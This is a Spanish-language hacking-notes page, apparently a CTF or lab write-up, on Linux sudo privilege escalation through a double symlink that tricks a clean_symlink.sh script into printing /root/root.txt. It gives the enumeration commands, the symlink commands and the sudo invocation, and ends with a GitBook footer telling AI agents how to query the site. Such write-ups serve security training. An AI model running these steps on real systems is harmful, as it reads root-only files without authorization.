> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/privesc/sudoers/sudo-double-symlink-linux-privilege-escalation.md).

# Sudo doble enlace simbólico - escalada de privilegios en Linux

## Qué es

La escalada de privilegios en sudoers comienza con los comandos que un usuario puede ejecutar mediante `sudo`. Los binarios mal configurados, los argumentos de scripts inseguros, el manejo de enlaces simbólicos y las versiones vulnerables de sudo pueden convertir permisos limitados de sudo en una shell de root. Esta página en particular se centra en **Sudo (doble enlace simbólico)** y mantiene práctico el flujo de explotación: identificar la condición, validarla de forma segura y luego ejecutar la carga útil mínima necesaria para demostrar el impacto.

## Enumeración

Comienza confirmando el contexto local y la configuración incorrecta exacta antes de ejecutar la ruta de explotación.

```bash
sudo -l
sudo --version
```

## Ejemplos

### SUDO - Clean/\_synLink.sh

Buscamos una vulnerabilidad que permita la escalada de privilegios. Descubrimos un archivo con permisos SUID.

<figure><img src="/files/83a23494a684845b6bde22c0f0349ee497d4dca5" alt=""><figcaption></figcaption></figure>

#### **Análisis del script de limpieza de enlaces simbólicos**

> Analizamos un script llamado `clean_symlink.sh`, que comprueba si el archivo proporcionado como argumento es un enlace simbólico que apunta a un `.png` archivo. Si el enlace simbólico apunta a un archivo crítico, el script lo elimina. De lo contrario, mueve el enlace simbólico al `/var/quarantined/` directorio. Si la variable de entorno `CHECK_CONTENT` está establecida en `true`, el script intenta leer el contenido del archivo.

Aquí está el comando para crear los enlaces simbólicos necesarios para la operación:

```bash
ln -s /root/root.txt flag.txt
ln -s /home/bob/flag.txt flag.png
```

Luego ejecutamos el script con el siguiente comando para obtener la flag de root:

```bash
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/flag.png 
```

Así obtenemos la flag `root.txt`.

<figure><img src="/files/de09806c99a21159c873001a0bb4aec52f5247a1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/privesc/sudoers/sudo-double-symlink-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
